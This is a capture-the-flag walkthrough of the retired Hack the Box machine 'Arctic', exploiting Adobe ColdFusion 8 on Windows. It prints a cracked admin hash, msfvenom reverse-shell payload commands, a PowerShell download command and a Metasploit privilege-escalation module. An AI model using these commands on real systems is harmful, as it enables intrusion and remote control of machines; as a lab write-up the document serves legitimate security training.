Hack the Box – Arctic Walkthrough

Today, we’re going to solve another CTF machine “Arctic”. It is now retired box and can be accessible to VIP members.


  • Target OS: Windows
  • IP Address:
  • Difficulty: Easy


  • Getting user
  • Getting root


As always, the first step consists of the reconnaissance phase as port scanning.

Ports Scanning

During this step, we’re gonna identify the target to see what we have behind the IP Address.

nmap -sC -sV -Pn --disable-arp-ping -oA

135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  unknown


Nmap reveals an unknown service running on port 8500 and if we browse page

If we browse the CFIDE/ and take a look inside administrator/ it reveals the ‘Adobe Coldfusion 8 Administrator’ login page.

The first thing i did is tested out basic creds which i can think of such as admin:admin/admin:administrator that didn’t work so i checked page source and inspected input fields but it was useless.

After that, Google for “Adobe Coldfusion 8 CVE”

Exploit: https://www.exploit-db.com/exploits/14641

Crack SHA1 Using Hashcat

hashcat -m 100 hash /usr/share/wordlists/rockyou.txt --force

Password: 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 / SHA1

Decrypted: happyday

Goto Debugging & Logging > Scheduled Tasks

Let’s Schedule New Task.


This gives the ability to download a file from a web server and save it locally. Under Server Settings > Mapping, We can verify the CFIDE path. Since our targeted machine is windows we have to create a jsp reverse shell.

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=1337 -f raw > shell.jsp

Task Name: Shell
File: C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

Click Submit and start the listener.

Click Run Scheduled Task

After running the scheduled task we got the reverse shell.

User flag can be obtained from C:\Users\tolis\Desktop\user.txt

Privilege Escalation

Since we have a low privilege shell we can try upgrading to a proper shell and go for privilege escalation.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1338 -f exe > shell.exe

Transfer our shell.exe file to the targeted box using Powershell.

powershell "(new-object System.Net.WebClient).Downloadfile('', 'shell.exe')"

And we got proper low priv reverse shell.

Since, we don’t know what to exploit for priv esc we’ll do some enumeration and the easiest way to do in metasploit is to use local_exploit_suggester module.

Module: post/multi/recon/local_exploit_suggester

We got bunch of suggestions through x86 shell but let’see what we get through x64 shell.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=1338 -f exe > shellx64.exe

Now, that we’re x64 let’s run local_exploit_suggester again.

Not much of a difference let’s try the first one (exploit/windows/local/ms10_092_schelevator).

Look’s like it worked!